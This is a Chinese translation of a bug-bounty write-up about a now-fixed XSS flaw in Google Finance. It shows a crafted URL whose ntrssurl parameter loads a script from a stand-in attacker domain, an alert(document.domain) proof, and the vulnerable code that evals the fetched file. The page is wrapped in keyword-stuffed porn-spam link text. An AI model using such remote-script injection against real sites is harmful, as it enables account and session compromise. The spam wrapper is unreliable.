成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

在谷歌財經發現一個XSS漏洞,拿5千美元獎勵

開發 項目管理
這個問題出現在Google Finance中(google.com/finance)。它能欺騙Javascript的走勢圖應用(源文件為/finance/f/sfe- opt.js),讓其載入一個托管在外部域上的文件,然后通過eval()方法將該文件內容轉換成Javascript代碼并執行。

我們在6月13日發了一篇資訊, 說“Google調整漏洞獎勵計劃,單個漏洞***獎勵7,500美元”。7月30日看到 Michele Spagnuolo 發的博文稱“他在 Google Finance 上發現并提交了一個 XSS 漏洞,谷歌安全團隊確認并修復了該漏洞。Michele 因此拿到了 5K 美元獎勵。” 以下是 Michele 博文的譯文。

這個問題出現在Google Finance中(google.com/finance)。它能欺騙Javascript的走勢圖應用(源文件為/finance/f/sfe- opt.js),讓其載入一個托管在外部域上的文件,然后通過eval()方法將該文件內容轉換成Javascript代碼并執行。

這個過程不需要用戶交互,只要點擊一下URL就可以了。

復現步驟:

1)點擊該URL(目前已修復):

https://www.google.com/finance?chdet=1214596800000&q=NASDAQ:INTC&ntsp=2&ntrssurl=https://evildomain.com/x.js.

文件x.js包含下列驗證代碼用來演示:

  1. alert(document.domain); 

該文件必須通過https來托管。

2)遠程Javascript被執行。

工作原理

以下是 /finance/f/sfe-opt.js中的兩個代碼片段,它們引起了這個安全問題。

  1. c.push("ntsp="); 
  2. c.push(b); 
  3. if (b == Vl.jj || b == Vl.kj) a = a.xc[ii(a.S)], a.lj() || (c.push("&ntrssurl="), c.push(escape(a.Cc || ""))); 
  4. return c.join("") 

在上面這段代碼中,URL參數,更確切的說是ntrssurl參數(用戶RSS源的地址)被獲取并進行了連接。

  1. Xi.prototype.send = function (a, b, c, d) { 
  2.     a = a || null; 
  3.     d = d || "_" + (Yi++).toString(36) + x().toString(36); 
  4.     n._callbacks_ || (n._callbacks_ = {}); 
  5.     var e = this.$s.Z(); 
  6.     if (a) 
  7.         for (var f in a) a.hasOwnProperty && !a.hasOwnProperty(f) || Fi(e, f, a[f]); 
  8.     b && (n._callbacks_[d] = Zi(d, b), Fi(e, this.Zs, "_callbacks_." + d)); 
  9.     b = Wi(e.toString(), { 
  10.         timeout: this.We, 
  11.         Ns: !0 
  12.     }); 
  13.     Si(b, null, $i(d, a, c), void 0); 
  14.     return { 
  15.         La: d, 
  16.         Du: b 
  17.     } 
  18. }; 

第二段代碼負責在外部域中查詢新聞源以將內容顯示在走勢圖中。

它生成一個回調函數名,以字串 “?_CALLBACK_”結尾。函數Wi對URL中的ntrssurl參數中的域名執行xmlhttprequest操作。

然后,返回了一段簡單的Javascript代碼,并且通過eval()方法將其執行。

http://s2.51cto.com/wyfs01/M00/14/03/wKioJlIBrH-h6OtvAAEZKFDEOAg537.jpg

觸發XSS漏洞的截圖

callback 請求截圖

有漏洞的代碼片段

這個安全隱患很快就被修復了,我因此得到了5000美元的獎勵。

非常感謝,Google安全小組!

原文鏈接:http://miki.it/blog/2013/7/30/xss-in-google-finance/

譯文鏈接:http://blog.jobbole.com/44953/

責任編輯:陳四芳 來源: 伯樂在線
相關推薦

2021-02-07 00:05:27

谷歌漏洞網絡安全

2021-03-15 09:50:01

漏洞網絡安全網絡攻擊

2020-12-09 19:31:57

Chrome谷歌漏洞

2010-04-30 15:45:09

2022-09-09 18:37:56

漏洞賞金開源

2020-10-09 07:49:17

黑客

2020-10-14 10:39:50

漏洞網絡攻擊網絡安全

2015-02-10 14:32:37

XSS漏洞XSS

2015-01-04 15:36:52

XSS漏洞XSS

2015-03-26 14:04:57

2012-07-31 09:22:23

2022-01-26 07:47:22

黑客漏洞網絡安全

2021-12-07 23:11:15

漏洞微軟谷歌

2013-05-13 10:24:44

谷歌開發團隊開發管理

2010-06-11 17:08:05

2018-05-23 09:28:23

2022-09-01 13:48:01

漏洞獎勵計劃漏洞

2024-08-29 15:09:09

2022-02-12 17:35:13

漏洞漏洞賞金谷歌

2012-03-09 09:31:21

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 日本在线观看网址 | 99热最新网址 | 日韩中文一区 | 福利av在线| 中文字幕在线中文 | 狠狠干天天干 | 免费看黄色片 | 成人免费视频在线观看 | 91精品免费 | 欧美一区二 | 久久aⅴ乱码一区二区三区 91综合网 | 成人av网站在线观看 | 国产999精品久久久影片官网 | 国产精品欧美一区二区三区不卡 | 日韩高清av | 99视频在线免费观看 | 一级黄色毛片 | 一区二区三区国产在线观看 | 久久免费观看视频 | 国产999精品久久久久久 | 欧美一区二区三区四区视频 | 免费黄色大片 | 国产精品乱码一区二区三区 | 免费日本视频 | 国产成人精品视频在线观看 | 欧美精品v国产精品v日韩精品 | 日韩免费视频一区二区 | 国产免费观看视频 | 99精品一区二区三区 | 欧美一级免费 | 日本精品一区二区三区在线观看视频 | 一区二区免费在线 | 精品免费视频一区二区 | 欧美一级黑人aaaaaaa做受 | 国产午夜在线观看 | 国产激情一区二区三区 | 欧美婷婷| 欧美 日韩 在线播放 | 欧美黄 片免费观看 | 每日更新av | 久久久久国产 |